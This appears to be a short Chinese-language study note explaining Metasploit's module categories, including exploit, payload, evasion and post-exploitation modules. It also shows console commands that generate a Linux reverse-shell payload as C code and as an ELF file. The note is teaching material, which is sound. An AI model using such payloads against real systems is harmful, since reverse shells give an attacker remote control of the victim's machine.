Metasploit 001 模块

## 模块分类
### 辅助模块（Auxiliary）

- 辅助模块不会直接使用 EXP 对目标发动攻击，但可以执行有用的任务，例如：
  1. 管理 - 修改、操作或操作目标计算机上的某些内容
  2. 分析 - 执行分析的工具，主要是密码破解
  3. 收集 - 从单个目标收集、收集或枚举数据
  4. 拒绝服务 - 使目标计算机或服务器崩溃或变慢
  5. 扫描 - 扫描目标以查找已知漏洞
  6. 服务器支持 - 用常见协议（如 SMB、FTP 等）启动一个服务

### 编码器模块（Encoder modules）

- 编码器首先获取有效负载的原始字节，并运行某种编码算法，如逐位XOR。这些模块对于编码无效字符（如空字节）非常有用。

### 规避免杀模块（Evasion modules ）

- 规避免杀模块使框架用户无需安装外部工具，就能够生成能够规避杀毒软件的 payload，如 Windows Defender。

### 漏洞利用模块（Exploit modules）

- 漏洞利用模块用于利用漏洞，使框架能够执行任意代码。所执行的任意代码被称为有效载荷（payload）。

### NOP 模块（Nop modules）

- NOP 模块是“无操作”的缩写，用来生成一系列无副作用的“非操作”指令。NOP通常与堆栈缓冲区溢出一起使用。该模块主要是当做一些无效数据进行随意填充的，如果使用很长的一些 NOP（0x90）指令填充可能被杀软识别，所以用一些正常的指令，但是指令没有进行啥有效操作。

### 有效载荷模块（Payloads modules）

- 在 Metasploit 漏洞利用模块的过程中，有效负载（payload）模块封装了作为漏洞利用成功后，执行的任意代码 （shellcode）。这通常涉及创建 Metasploit 会话，但可能会执行一些其他功能，例如添加用户帐户，或执行简单的 pingback 命令来验证代码执行是否成功针对易受攻击的目标。

- 有效负载模块也可以单独用于生成独立的可执行文件或 shellcode，以便在漏洞利用中使用，如下：

```
msf6 payload(linux/x86/shell_reverse_tcp) > back
msf6 > use payload/linux/x86/shell_reverse_tcp
msf6 payload(linux/x86/shell_reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 payload(linux/x86/shell_reverse_tcp) > set lport 4444
lport => 4444

# 生成在 C 中使用的有效载荷
msf6 payload(linux/x86/shell_reverse_tcp) > generate -f c

# 生成ELF文件以在Linux环境中执行
msf6 payload(linux/x86/shell_reverse_tcp) > generate -f elf -o linux_shell
```

### 后渗透攻击模块（Post modules）

- 这些模块在计算机成功被入侵并打开 Metasploit 会话后很有用。它们执行有用的任务，例如从会话中收集、收集或枚举数据。